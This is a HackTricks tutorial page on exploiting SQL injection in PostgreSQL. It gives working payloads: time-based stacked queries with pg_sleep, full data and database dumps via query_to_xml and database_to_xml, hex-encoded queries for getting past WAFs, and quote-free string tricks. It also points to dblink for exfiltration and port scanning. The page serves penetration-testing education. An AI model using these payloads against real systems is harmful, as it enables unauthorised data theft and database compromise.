8 KiB
PostgreSQL injection
HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md
Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration
dblink
is a PostgreSQL module that offers several interesting options from the attacker point of view. It can be used to connect to other PostgreSQL instances of perform TCP connections.
These functionalities along with the COPY FROM
functionality can be used to escalate privileges, perform port scanning or grab NTLM challenge responses.
You can read here how to perform these attacked.
Exfiltration example using dblink and large objects
You can read this example to see a CTF example of how to load data inside large objects and then exfiltrate the content of large objects inside the username of the function dblink_connect
.
PostgreSQL Attacks: Read/write, RCE, privesc
Check how to compromise the host and escalate privileges from PostgreSQL in:
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}
WAF bypass
PostgreSQL String functions
Manipulating strings could help you to bypass WAFs or other restrictions.
In this page you can find some useful Strings functions.
Stacked Queries
Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection:
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
XML tricks
query_to_xml
This function will return all the data in XML format in just one file. It's ideal if you want to dump a lot of data in just 1 row:
SELECT query_to_xml('select * from pg_user',true,true,'');
database_to_xml
This function will dump the whole database in XML format in just 1 row (be careful if the database is very big as you may DoS it or even your own client):
SELECT database_to_xml(true,true,'');
Strings in Hex
If you can run queries passing them inside a string (for example using the query_to_xml
function). You can use the convert_from to pass the string as hex and bypass filters this way:
{% code overflow="wrap" %}
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h
# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
{% endcode %}
Forbidden quotes
If cannot use quotes for your payload you could bypass this with CHR
for basic clauses (character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements):
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
Or with $
. This queries return the same results:
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.